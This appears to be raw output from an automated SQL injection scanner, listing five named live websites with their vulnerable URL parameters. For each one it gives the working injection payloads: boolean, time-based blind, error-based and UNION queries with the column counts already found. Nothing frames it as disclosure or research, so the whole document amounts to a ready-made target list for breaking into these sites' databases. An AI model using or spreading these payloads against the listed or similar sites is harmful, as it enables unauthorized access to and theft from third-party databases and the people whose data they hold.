------------------------------------------http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=5
Payload: idnow=4 AND 9354=9354

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idnow=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: idnow=4 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162716271,0x4e4a474f454141426964765579775144786768675a676563445947416c4f52416d5a4667696e474a,0x71627a6271),NULL,NULL,NULL,NULL-- HeEJ


------------------------------------------http://www.kaiyuancn.com/news_read.php?id=160&catg_code=news-1-3-2
Payload: id=160 AND 8233=8233

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=160 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 32 columns
    Payload: id=-1738 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178717a71,0x724d676c6657506b77514e6e55796366427462707078726842464f6a52566c724e736b744e504268,0x716b716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uYnS


------------------------------------------http://www.shxj888.com/product.php?id=7
Payload: id=7 AND 7588=7588

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=7 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=7 UNION ALL SELECT CONCAT(0x717a6b6271,0x75594f67756475656a6846494b784250756172715a6b54514a494a63636a594e66496b7979674d4b,0x71716b7071),NULL,NULL,NULL,NULL,NULL-- glyA


------------------------------------------http://www.runtry.com/list.php?id=140
Payload: id=140 AND 2848=2848


------------------------------------------http://www.youcareyk.com/contact.php?id=55
Payload: id=55 AND 7225=7225

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=55 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766b6b71,(SELECT (ELT(5728=5728,1))),0x7162787a71,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=55 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 26 columns
    Payload: id=-2022 UNION ALL SELECT CONCAT(0x71766b6b71,0x6a5a4b686e4a78654d6d72507844704965457646476b52576e526f6d7a76514d6e4d794d55515271,0x7162787a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dqKo


